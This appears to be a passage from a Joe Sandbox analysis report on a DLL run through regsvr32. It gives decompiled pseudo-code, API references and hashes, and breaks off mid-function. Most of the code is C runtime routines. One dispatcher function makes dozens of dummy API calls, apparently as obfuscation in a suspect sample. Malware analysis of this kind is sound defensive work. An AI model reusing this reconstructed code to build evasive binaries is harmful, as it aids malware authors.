0x6f8469e2
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000001,6F848BA2,00000000,00000000,?,6F848BA2,?), ref: 6F8469BA

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 1bf1de3a6295c32259e3bbdbdba4fd3025900568e850f2af5441e8a4a44c5196
Instruction ID: f97ce42b26dfe4c6f166e84954dc1c29ecd594a92054ccf5ea96b0e7f6699927
Opcode Fuzzy Hash: 1bf1de3a6295c32259e3bbdbdba4fd3025900568e850f2af5441e8a4a44c5196
Instruction Fuzzy Hash: 22F03074E8830CBBE750ABF88C06B9DBBB4DF04B01F1049D4FA09EE1C0D6B59A508765

Uniqueness

Uniqueness Score: -1.00%

Function 6F8419F0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F8419F0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v16 = E6F842190(__eflags);
				_v8 =  *((intOrPtr*)(E6F8412B0(_a8)));
				_v12 =  *((intOrPtr*)(E6F8412B0(_a4)));
				return StrCmpIW(_v12, _v8);
			}

0x6f8419f6
0x6f8419fe
0x6f841a0c
0x6f841a1a
0x6f841a2b

APIs

StrCmpIW.SHLWAPI(?,00000000,?,6F845D13,?,6F845D13,?,00000000,6F84265E,E463DA3C,?,6F845DAA), ref: 6F841A25

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
Instruction ID: 62b06b3219bd6a78961571a62fa89fd106193182bbeb86f1ed09a4ab18608664
Opcode Fuzzy Hash: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
Instruction Fuzzy Hash: 72E04C79D0460CBF8B05DFE8D44489EB7B5AB58304B108999E615DB350DB349A109B94

Uniqueness

Uniqueness Score: -1.00%

Function 6F84C2B0 Relevance: 1.5, APIs: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F84C2B0(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E6F84DC0E(_a4); // executed
				return _t5;
			}

0x6f84c2b9
0x6f84c2c3
0x6f84c2ca

APIs

_free.LIBCMT ref: 6F84C2C3

Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: f23d6dbf9a85b4c9ad5e1337a3be32e45efe08f72eb37184d3eeb89a74728ec8
Instruction ID: 7e789886bb6fa8db67f3d9d8ab753ad4b69838ed9ab4cc7355b732d06e0e4b6f
Opcode Fuzzy Hash: f23d6dbf9a85b4c9ad5e1337a3be32e45efe08f72eb37184d3eeb89a74728ec8
Instruction Fuzzy Hash: D9C04C7250020CFBDB05DB85DA06A4E7BA9DB80368F204094E4155B290DBB1EE459690

Uniqueness

Uniqueness Score: -1.00%

Function 6F846FF0 Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F846FF0(long _a4) {
				void* _t4;

				_t4 = HeapAlloc(E6F8483B0(), 0, _a4); // executed
				return _t4;
			}

0x6f846fff
0x6f847006

APIs

HeapAlloc.KERNEL32(00000000,00000000,?,?,6F847621,?,?), ref: 6F846FFF

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 6c5e8dabe631fde476d12a4534f63eae3969ce94ac74811cbe465d3c59002265
Instruction ID: 4064a3874a428fbf7589521c33879761902f0bae86e503806cb4f8436b34a8e9
Opcode Fuzzy Hash: 6c5e8dabe631fde476d12a4534f63eae3969ce94ac74811cbe465d3c59002265
Instruction Fuzzy Hash: 43C09BB115470C7BDD40A7EC9809F56775C9724A15F004451BB048E141C775B42485F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F849839 Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6F849839(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6F849954(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6F84A330(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6F84A330(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6F849954(_t49);
				}
				return _t49;
			}

0x6f849839
0x6f849839
0x6f849839
0x6f84984d
0x6f84984f
0x6f849852
0x6f849852
0x6f849856
0x6f84985b
0x6f849873
0x6f849879
0x6f84987f
0x6f849885
0x6f84988b
0x6f849891
0x6f849897
0x6f84989e
0x6f8498a5
0x6f8498ac
0x6f8498b3
0x6f8498ba
0x6f8498c1
0x6f8498c2
0x6f8498cb
0x6f8498d1
0x6f8498d4
0x6f8498da
0x6f8498e9
0x6f8498f5
0x6f849900
0x6f849907
0x6f84990e
0x6f849919
0x6f849921
0x6f84992a
0x6f84992c
0x6f84992f
0x6f849931
0x6f84993b
0x6f849943
0x6f849949
0x00000000
0x6f849950
0x6f849953

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F849845
IsDebuggerPresent.KERNEL32 ref: 6F849911
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F849931
UnhandledExceptionFilter.KERNEL32(?), ref: 6F84993B

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: f4f6309902edbffa0cfa61ec11645906f2f8d393b2a5486c16f6e01efe85b181
Instruction ID: c527434b04eb0eb2e24f6c3bafee487a826135c3bafef0a8bab67c7e8602e548
Opcode Fuzzy Hash: f4f6309902edbffa0cfa61ec11645906f2f8d393b2a5486c16f6e01efe85b181
Instruction Fuzzy Hash: 0731F67590531D9BDF60DF64C9897CDBBB8AF04304F1040EAE40DAB280EB749A88CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6F848630 Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 327
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E6F848630(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				long _v12;
				int _v16;
				int _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				int _v44;
				struct HMENU__* _v48;
				intOrPtr _v52;
				int _v56;
				WCHAR* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				int _v72;
				intOrPtr _v76;
				long _v80;
				long _v84;
				long _v88;
				long _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				struct _SID_IDENTIFIER_AUTHORITY* _v120;
				int _v124;
				int _v128;
				int _v132;
				intOrPtr _v136;
				long _v140;
				long _v144;
				void* _v148;
				char _v164;
				void* _t116;
				intOrPtr _t118;
				void* _t180;

				if((E6F845D90(__eflags) & 0x000000ff) == 0) {
					L87:
					__eflags = 0;
					return 0;
				}
				_t184 = _a4;
				if(_a4 == 0) {
					goto L87;
				}
				_t116 = E6F845910(_t184);
				_t185 = _t116;
				if(_t116 == 0) {
					return 1;
				}
				_t118 = E6F847700(_t185);
				if(_t118 == 0) {
					return 1;
				}
				if(_a4 == 2) {
					_v12 = FormatMessageA(0, 0, 0, 0, 0, 0, 0);
					return _a4;
				}
				__eflags = _a4 - 3;
				if(_a4 == 3) {
					_v16 = TextOutW(0, 0, 0, 0, 0);
					return _a4;
				}
				__eflags = _a4 - 4;
				if(_a4 != 4) {
					__eflags = _a4 - 5;
					if(_a4 != 5) {
						__eflags = _a4 - 6;
						if(_a4 != 6) {
							__eflags = _a4 - 7;
							if(_a4 != 7) {
								__eflags = _a4 - 8;
								if(_a4 != 8) {
									__eflags = _a4 - 9;
									if(_a4 != 9) {
										__eflags = _a4 - 0xa;
										if(_a4 != 0xa) {
											__eflags = _a4 - 0xb;
											if(_a4 != 0xb) {
												__eflags = _a4 - 0xc;
												if(_a4 != 0xc) {
													__eflags = _a4 - 0xd;
													if(_a4 != 0xd) {
														__eflags = _a4 - 0xe;
														if(_a4 != 0xe) {
															__eflags = _a4 - 0xf;
															if(_a4 != 0xf) {
																__eflags = _a4 - 0x10;
																if(_a4 != 0x10) {
																	__eflags = _a4 - 0x11;
																	if(_a4 != 0x11) {
																		__eflags = _a4 - 0x12;
																		if(_a4 != 0x12) {
																			__eflags = _a4 - 0x13;
																			if(_a4 != 0x13) {
																				__eflags = _a4 - 0x14;
																				if(_a4 != 0x14) {
																					__eflags = _a4 - 0x15;
																					if(_a4 != 0x15) {
																						__eflags = _a4 - 0x16;
																						if(_a4 != 0x16) {
																							__eflags = _a4 - 0x17;
																							if(_a4 != 0x17) {
																								__eflags = _a4 - 0x18;
																								if(_a4 != 0x18) {
																									__eflags = _a4 - 0x19;
																									if(_a4 != 0x19) {
																										__eflags = _a4 - 0x1a;
																										if(_a4 != 0x1a) {
																											__eflags = _a4 - 0x1b;
																											if(_a4 != 0x1b) {
																												__eflags = _a4 - 1;
																												if(_a4 == 1) {
																													__eflags = _a8;
																													if(_a8 != 0) {
																														__eflags = E6F847670();
																														if(__eflags == 0) {
																															_t118 = E6F846960(_t180);
																															__eflags = _t118;
																															if(_t118 != 0) {
																																_t118 = E6F847770();
																																_v8 = _t118;
																																__eflags = _v8 - 1;
																																if(_v8 == 1) {
																																	__eflags = E6F8471E0();
																																	if(__eflags == 0) {
																																		_t118 = E6F846390(__eflags);
																																	} else {
																																		_t118 = E6F846390(__eflags);
																																	}
																																}
																															}
																														} else {
																															_t118 = E6F846390(__eflags);
																														}
																													}
																												}
																												__eflags = _a4 - 0x1c;
																												if(_a4 != 0x1c) {
																													__eflags = _a4 - 0x1d;
																													if(_a4 != 0x1d) {
																														__eflags = _a4 - 0x1e;
																														if(_a4 != 0x1e) {
																															__eflags = _a4 - 0x1f;
																															if(_a4 != 0x1f) {
																																__eflags = _a4 - 0x20;
																																if(_a4 != 0x20) {
																																	__eflags = _a4 - 0x21;
																																	if(_a4 != 0x21) {
																																		__eflags = _a4 - 0x22;
																																		if(_a4 != 0x22) {
																																			__eflags = _a4 - 0x23;
																																			if(_a4 != 0x23) {
																																				__eflags = _a4 - 0x24;
																																				if(_a4 != 0x24) {
																																					goto L87;
																																				}
																																				_v148 = DuplicateIcon(0, 0);
																																				return _a4;
																																			}
																																			_v144 = SHStrDupA(0, 0);
																																			return _a4;
																																		}
																																		_v140 = SHStrDupW(0, 0);
																																		return _a4;
																																	}
																																	__imp__CreateMutexExW(0, 0, 0, 0);
																																	_v136 = _t118;
																																	return _a4;
																																}
																																_v132 = IsValidSid(0);
																																return _a4;
																															}
																															_v128 = IsValidAcl(0);
																															return _a4;
																														}
																														_v124 = DisableThreadLibraryCalls(0);
																														return _a4;
																													}
																													_v120 = GetSidIdentifierAuthority(0);
																													return _a4;
																												}
																												__imp__CoTaskMemAlloc(0);
																												_v116 = _t118;
																												return _a4;
																											}
																											__imp__CoCancelCall(0, 0);
																											_v112 = _t118;
																											return _a4;
																										}
																										__imp__CveEventWrite(0, 0);
																										_v108 = _t118;
																										return _a4;
																									}
																									__imp__RpcExceptionFilter(0);
																									_v104 = _t118;
																									return _a4;
																								}
																								_v100 = RevertToSelf();
																								return _a4;
																							}
																							__imp__IsTokenRestricted(0);
																							_v96 = _t118;
																							return _a4;
																						}
																						_v92 = GetProcessId(0);
																						return _a4;
																					}
																					_v88 = GetPriorityClass(0);
																					return _a4;
																				}
																				_v84 = GetVersion();
																				return _a4;
																			}
																			_v80 = GetMessageTime();
																			return _a4;
																		}
																		__imp__UuidCreate(0);
																		_v76 = _t118;
																		return _a4;
																	}
																	_v72 = GetConsoleCP();
																	return _a4;
																}
																__imp__DceErrorInqTextA(0, 0);
																_v68 = _t118;
																return _a4;
															}
															__imp__SHGetThreadRef(0);
															_v64 = _t118;
															return _a4;
														}
														_v60 = CharNextW(0);
														return _a4;
													}
													_v56 = SetFileAttributesW(0, 0);
													return _a4;
												}
												__imp__GetProductInfo(0, 0, 0, 0, 0);
												_v52 = _t118;
												return _a4;
											}
											_v48 = CreatePopupMenu();
											return _a4;
										}
										_v44 = FlattenPath(0);
										return _a4;
									}
									__imp__CoGetCallerTID(0);
									_v40 = _t118;
									return _a4;
								}
								__imp__CoCreateInstance( &_v164, 0, 0,  &_v164, 0);
								_v36 = _t118;
								return _a4;
							}
							__imp__OleInitialize(0);
							_v32 = _t118;
							return _a4;
						}
						__imp__CoInitialize(0);
						_v28 = _t118;
						return _a4;
					}
					_v24 = FormatMessageW(0, 0, 0, 0, 0, 0, 0);
					return _a4;
				} else {
					_v20 = TextOutA(0, 0, 0, 0, 0);
					return _a4;
				}
			}

0x6f848643
0x6f848a7e
0x6f848a7e
0x00000000
0x6f848a7e
0x6f848649
0x6f84864d
0x00000000
0x00000000
0x6f848653
0x6f848658
0x6f84865a
0x00000000
0x6f848a77
0x6f848660
0x6f848667
0x00000000
0x6f848a6e
0x6f848671
0x6f848687
0x00000000
0x6f84868a
0x6f848692
0x6f848696
0x6f8486a8
0x00000000
0x6f8486ab
0x6f8486b3
0x6f8486b7
0x6f8486d4
0x6f8486d8
0x6f8486f9
0x6f8486fd
0x6f848712
0x6f848716
0x6f84872b
0x6f84872f
0x6f848756
0x6f84875a
0x6f84876f
0x6f848773
0x6f848788
0x6f84878c
0x6f84879f
0x6f8487a3
0x6f8487c0
0x6f8487c4
0x6f8487db
0x6f8487df
0x6f8487f4
0x6f8487f8
0x6f84880d
0x6f848811
0x6f848828
0x6f84882c
0x6f84883f
0x6f848843
0x6f848858
0x6f84885c
0x6f84886f
0x6f848873
0x6f848886
0x6f84888a
0x6f84889f
0x6f8488a3
0x6f8488b8
0x6f8488bc
0x6f8488d1
0x6f8488d5
0x6f8488e8
0x6f8488ec
0x6f848901
0x6f848905
0x6f84891c
0x6f848920
0x6f848937
0x6f84893b
0x6f84893d
0x6f848941
0x6f848948
0x6f84894a
0x6f848953
0x6f848958
0x6f84895a
0x6f84895c
0x6f848961
0x6f848964
0x6f848968
0x6f84896f
0x6f848971
0x6f84897a
0x6f848973
0x6f848973
0x6f848973
0x6f848971
0x6f848968
0x6f84894c
0x6f84894c
0x6f84894c
0x6f84894a
0x6f848941
0x6f84897f
0x6f848983
0x6f848998
0x6f84899c
0x6f8489b1
0x6f8489b5
0x6f8489ca
0x6f8489ce
0x6f8489e3
0x6f8489e7
0x6f8489fc
0x6f848a00
0x6f848a1b
0x6f848a1f
0x6f848a36
0x6f848a3a
0x6f848a51
0x6f848a55
0x00000000
0x6f848a75
0x6f848a61
0x00000000
0x6f848a67
0x6f848a46
0x00000000
0x6f848a4c
0x6f848a2b
0x00000000
0x6f848a31
0x6f848a0a
0x6f848a10
0x00000000
0x6f848a16
0x6f8489f1
0x00000000
0x6f8489f4
0x6f8489d8
0x00000000
0x6f8489db
0x6f8489bf
0x00000000
0x6f8489c2
0x6f8489a6
0x00000000
0x6f8489a9
0x6f848987
0x6f84898d
0x00000000
0x6f848990
0x6f848926
0x6f84892c
0x00000000
0x6f84892f
0x6f84890b
0x6f848911
0x00000000
0x6f848914
0x6f8488f0
0x6f8488f6
0x00000000
0x6f8488f9
0x6f8488dd
0x00000000
0x6f8488e0
0x6f8488c0
0x6f8488c6
0x00000000
0x6f8488c9
0x6f8488ad
0x00000000
0x6f8488b0
0x6f848894
0x00000000
0x6f848897
0x6f84887b
0x00000000
0x6f84887e
0x6f848864
0x00000000
0x6f848867
0x6f848847
0x6f84884d
0x00000000
0x6f848850
0x6f848834
0x00000000
0x6f848837
0x6f848817
0x6f84881d
0x00000000
0x6f848820
0x6f8487fc
0x6f848802
0x00000000
0x6f848805
0x6f8487e9
0x00000000
0x6f8487ec
0x6f8487d0
0x00000000
0x6f8487d3
0x6f8487af
0x6f8487b5
0x00000000
0x6f8487b8
0x6f848794
0x00000000
0x6f848797
0x6f84877d
0x00000000
0x6f848780
0x6f84875e
0x6f848764
0x00000000
0x6f848767
0x6f848745
0x6f84874b
0x00000000
0x6f84874e
0x6f84871a
0x6f848720
0x00000000
0x6f848723
0x6f848701
0x6f848707
0x00000000
0x6f84870a
0x6f8486ee
0x00000000
0x6f8486b9
0x6f8486c9
0x00000000
0x6f8486cc

APIs

Part of subcall function 6F845D90: LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6F845EBF

FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F848681
TextOutW.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 6F8486A2

Strings

$, xrefs: 6F848A51

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: FormatLibraryLoadMessageText
String ID: $
API String ID: 775064453-3993045852
Opcode ID: c85d22d830a4f61c43e4195fc6f7fe41ada78860079dea31cb39602940eca8ba
Instruction ID: 2d693a5374c2eab2f6b8340f088da7c62020754ebf413ff9681a9f0a002ee3e1
Opcode Fuzzy Hash: c85d22d830a4f61c43e4195fc6f7fe41ada78860079dea31cb39602940eca8ba
Instruction Fuzzy Hash: FAC1C630A8930CEFDF94DFA8C54978C7BB0AF06356F108995E9099E680D774A594CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6F850367 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F850367(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6f85c708) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6F84DC0E(_t46);
							E6F85180D( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6F84DC0E(_t47);
							E6F85190B( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6F84DC0E( *((intOrPtr*)(_t74 + 0x7c)));
						E6F84DC0E( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6F84DC0E( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6F84DC0E( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6F84DC0E( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6F84DC0E( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6F8504D8( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6f85c1d8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6F84DC0E(_t31);
							E6F84DC0E( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6F84DC0E(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6F84DC0E(_t74);
			}

0x6f85036f
0x6f850373
0x6f85037b
0x6f850384
0x6f850389
0x6f850390
0x6f850398
0x6f8503a0
0x6f8503ab
0x6f8503b1
0x6f8503b2
0x6f8503ba
0x6f8503c2
0x6f8503cd
0x6f8503d3
0x6f8503d7
0x6f8503e2
0x6f8503e8
0x6f850389
0x6f8503e9
0x6f8503f1
0x6f850404
0x6f850417
0x6f850425
0x6f850430
0x6f850435
0x6f85043e
0x6f850446
0x6f850447
0x6f85044d
0x6f850450
0x6f850453
0x6f85045a
0x6f85045c
0x6f850460
0x6f850468
0x6f85046f
0x6f850475
0x6f850476
0x6f850476
0x6f85047d
0x6f85047f
0x6f850484
0x6f85048c
0x6f850491
0x6f850492
0x6f850492
0x6f850495
0x6f850498
0x6f85049b
0x6f85049e
0x6f85049e
0x6f8504ae

APIs

___free_lconv_mon.LIBCMT ref: 6F8503AB

Part of subcall function 6F85180D: _free.LIBCMT ref: 6F85182A
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F85183C
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F85184E
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F851860
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F851872
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F851884
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F851896
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F8518A8
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F8518BA
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F8518CC
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F8518DE
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F8518F0
Part of subcall function 6F85180D: _free.LIBCMT ref: 6F851902

_free.LIBCMT ref: 6F8503A0

Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36

_free.LIBCMT ref: 6F8503C2
_free.LIBCMT ref: 6F8503D7
_free.LIBCMT ref: 6F8503E2
_free.LIBCMT ref: 6F850404
_free.LIBCMT ref: 6F850417
_free.LIBCMT ref: 6F850425
_free.LIBCMT ref: 6F850430
_free.LIBCMT ref: 6F850468
_free.LIBCMT ref: 6F85046F
_free.LIBCMT ref: 6F85048C
_free.LIBCMT ref: 6F8504A4

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 036e9d47e2115af19903abb6fcdd8fada6105433581af161352e6d67287489f1
Instruction ID: 994ed450c550fc9955c1b9bccc1f59197d9514bf81c5dc32da09a1ada55c7821
Opcode Fuzzy Hash: 036e9d47e2115af19903abb6fcdd8fada6105433581af161352e6d67287489f1
Instruction Fuzzy Hash: 2C314532504709EFEB559A79D940B8A73EAAF0035CF105D9AE455DF290EF70F891CB10

Uniqueness

Uniqueness Score: -1.00%

Function 6F84B0CB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6F84B0CB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
